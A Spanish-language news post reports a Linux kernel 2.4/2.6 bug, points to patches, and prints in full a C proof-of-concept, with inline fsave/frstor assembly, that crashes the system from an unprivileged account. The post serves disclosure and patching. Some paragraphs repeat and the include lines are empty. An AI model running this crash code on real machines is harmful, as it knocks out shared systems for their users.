Nuevo Bug en Kernels 2.4 y 2.6
Un bug en las últimas versiones del kernel de linux 2.4 y 2.6, hace que un simple programa en C pueda colgar todo el sistema.
Son vulnerables prácticamente todas las versiones (en el momento de escribir el artículo, ha salido 2.6.7, que soluciona el bug), menos algunos kernels de gentoo y otras distros.
Parches para 2.4:
Son vulnerables prácticamente todas las versiones (en el momento de escribir el artículo, ha salido 2.6.7, que soluciona el bug), menos algunos kernels de gentoo y otras distros.
Parches para 2.4:
Parche para 2.4 x86-64
Parches para 2.6:
Nota: El nuevo kernel 2.6.7 ya soluciona este bug. El link para bajarlo está en el marco de kernels a la derecha de la web.
Parche para 2.6, x86-64
Recordando por penúltima vez como se aplica un parche al kernel:
Suponiendo que tenemos las fuentes en /usr/src/linux-2.4.26, y que el parche se llama nombre_parche.patch,
# patch -p1 -d /usr/src/linux-2.4.26
Y éste es el código que cuelga la máquina:
/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include
#include
#include
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// 
